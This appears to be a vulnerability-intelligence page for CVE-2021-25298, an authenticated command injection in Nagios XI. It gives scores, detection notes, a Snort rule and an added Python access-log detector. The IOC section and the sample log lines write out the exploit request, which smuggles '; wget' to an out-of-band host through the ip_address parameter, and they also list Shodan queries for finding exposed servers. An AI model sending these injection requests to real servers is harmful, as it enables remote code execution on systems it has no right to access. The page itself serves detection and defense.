CVE-2021-25298
published 2021-02-15

CVE-2021-25298: Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file…

Priority: P1 · 92 · high
CVSS 3.1: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Flags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, due 2022-02-01
Exploited in the wild
EPSS: 75.20% (99.4th percentile)
Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.

Affected (1 range)

Vendor   Product    Version range   Fixed in
nagios   nagios_xi  5.5.6 – 5.7.5   (none listed)

Detection & IOCs (extracted from sources)

path: /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php
url: /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20wget%20{{interactsh-url}}%3b
path: /nagiosxi/config/monitoringwizard.php
command: ip_address=127.0.0.1%3b%20wget%20<oast-url>%3b
snort rule:
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"nagiosxi/config/monitoringwizard.php?"; fast_pattern; content:"ip_address="; content:"|3b|"; within:30; reference:cve,2021-25296; reference:cve,2021-25297; classtype:attempted-admin; sid:2034993; rev:1; metadata:attack_target Server, created_at 2022_01_27, cve CVE_2021_25296_CVE_2021_25297, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_01_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • Exploit requests target GET /nagiosxi/config/monitoringwizard.php with the parameters wizard=digitalocean (or cloud-vm, switch, windowswmi), nextstep=4, and a command-injection payload in the ip_address parameter, where the command separator is a URL-encoded semicolon (%3b).
  • The Emerging Threats Snort rule (sid:2034993) matches GET requests to nagiosxi/config/monitoringwizard.php? that contain ip_address= followed by a semicolon byte (|3b|, i.e. a decoded %3b) within 30 bytes. Because http.uri is matched on the normalized (percent-decoded) URI buffer, apply the same pattern to decoded URIs when hunting in proxy or web-server logs.
  • Exploitation requires prior authentication; look for a POST to /nagiosxi/login.php followed shortly by the malicious GET to monitoringwizard.php from the same source IP.
  • The Metasploit module targets Nagios XI versions 5.5.6 to 5.7.5 across three wizards (windowswmi, switch, cloud-vm); version fingerprinting of Nagios XI instances in this range should be prioritised for patching and monitoring.
  • Successful exploitation runs commands as the apache user; monitor for unexpected child processes of apache/httpd, especially outbound wget or curl invocations.
  • Shodan/FOFA exposure queries can identify internet-facing Nagios XI instances: search for title:"Nagios XI" or http.title:"nagios xi" to enumerate the attack surface.
  • The Nuclei template uses the 'digitalocean' wizard name in the exploit request, but the vulnerable file is cloud-vm.inc.php; the Metasploit module also covers the 'windowswmi' and 'switch' wizards for the related CVE-2021-25296 and CVE-2021-25297. Detection rules should account for all of these wizard names rather than keying on a single one.
  • The Emerging Threats Snort rule (sid:2034993) references CVE-2021-25296 and CVE-2021-25297 in its metadata, but its match criteria (monitoringwizard.php, ip_address=, semicolon) also cover the CVE-2021-25298 request pattern; ensure sid:2034993 is present and enabled in your deployed ET ruleset.
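The detection notes above describe two checks: the ET rule's URI pattern and the login-then-wizard correlation. The following is an added example that re-implements both over web-server access logs; it is not code from this CVE entry, the Emerging Threats ruleset, Nagios, or the Metasploit/Nuclei projects. The log lines are constructed, the combined-log regex is an assumption about the log format, and the 30-second login window is an arbitrary correlation choice. It decodes the URI before matching so that both a percent-encoded %3b and a raw semicolon are caught, and it reports the wizard name so all the wizard variants listed above are flagged.

```python
"""Access-log detector for CVE-2021-25298-style requests.

Added example for this page; not code from the CVE entry, the Emerging
Threats ruleset, Nagios, or the Metasploit/Nuclei projects. It mirrors the
match logic of ET sid:2034993 in Python and adds the login-then-wizard
correlation from the detection notes. The log lines, the 30-second login
window and the combined-log regex are assumptions.
"""
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format lines (not real traffic). Line 2 is the
# Nuclei-style payload after a login, line 3 is a benign wizard call, line 4
# uses a raw ';' and a different wizard with no preceding login.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Jan/2022:10:15:01 +0000] "POST /nagiosxi/login.php HTTP/1.1" 302 0 "-" "curl/7.68.0"
203.0.113.7 - - [27/Jan/2022:10:15:03 +0000] "GET /nagiosxi/config/monitoringwizard.php?update=1&nsp=abc123&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20wget%20http://203.0.113.7/p%3b HTTP/1.1" 200 4120 "-" "curl/7.68.0"
198.51.100.4 - - [27/Jan/2022:10:20:10 +0000] "GET /nagiosxi/config/monitoringwizard.php?update=1&nsp=def456&nextstep=4&wizard=switch&ip_address=10.0.0.5 HTTP/1.1" 200 3981 "-" "Mozilla/5.0"
198.51.100.9 - - [27/Jan/2022:10:25:00 +0000] "GET /nagiosxi/config/monitoringwizard.php?update=1&nsp=ghi789&nextstep=4&wizard=windowswmi&ip_address=10.0.0.6;id HTTP/1.1" 200 3990 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

URI_MARKER = "nagiosxi/config/monitoringwizard.php?"
PARAM_MARKER = "ip_address="
WITHIN = 30            # ET rule: content:"|3b|"; within:30 (bytes after "ip_address=")
WIZARDS = {"digitalocean", "cloud-vm", "switch", "windowswmi"}  # names seen in the PoCs
LOGIN_PATH = "/nagiosxi/login.php"
LOGIN_WINDOW = timedelta(seconds=30)  # assumption: login must precede the GET by <= 30 s


def parse_line(line):
    """Parse one combined-format log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "uri": m["uri"],
        "status": int(m["status"]),
    }


def matches_rule(method, uri):
    """Mirror sid:2034993: GET, URI contains the wizard path, and a ';' follows
    'ip_address=' within 30 bytes. Snort/Suricata match http.uri on the
    normalized (percent-decoded) buffer, so decode first: this catches both
    %3b and a raw ';' however the web server logged it."""
    if method != "GET":
        return False
    decoded = unquote(uri)
    if URI_MARKER not in decoded:
        return False
    idx = decoded.find(PARAM_MARKER)
    if idx < 0:
        return False
    start = idx + len(PARAM_MARKER)
    return ";" in decoded[start:start + WITHIN]


def detect(log_text):
    """Return one alert per matching request, with the wizard name, the decoded
    ip_address payload, and whether the same source IP POSTed to login.php
    within LOGIN_WINDOW before it (exploitation needs a session)."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    alerts = []
    for e in events:
        if not matches_rule(e["method"], e["uri"]):
            continue
        qs = parse_qs(urlsplit(e["uri"]).query)  # parse the raw query; parse_qs decodes values
        wizard = qs.get("wizard", [""])[0]
        login_seen = any(
            p["ip"] == e["ip"] and p["method"] == "POST"
            and p["uri"].startswith(LOGIN_PATH)
            and timedelta(0) <= e["ts"] - p["ts"] <= LOGIN_WINDOW
            for p in events
        )
        alerts.append({
            "ip": e["ip"],
            "ts": e["ts"].isoformat(),
            "wizard": wizard,
            "known_wizard": wizard in WIZARDS,
            "ip_address": qs.get("ip_address", [""])[0],
            "login_seen": login_seen,
        })
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a)
```

Run it as-is to see the two alerts from the constructed sample (the benign switch-wizard call produces none). An alert with login_seen False is not necessarily benign: the session may have been established earlier than the window, or the login may have gone through a different front end, so treat the correlation as an enrichment rather than a filter.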

CVSS provenance

nvd v3.1: 8.8 HIGH  CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd v2.0: 9.0 HIGH  AV:N/AC:L/Au:S/C:C/I:C/A:C (CVSS v2 has no Critical band; 7.0 to 10.0 is High)
vulncheck: 8.8 HIGH
cisa: 8.8 HIGH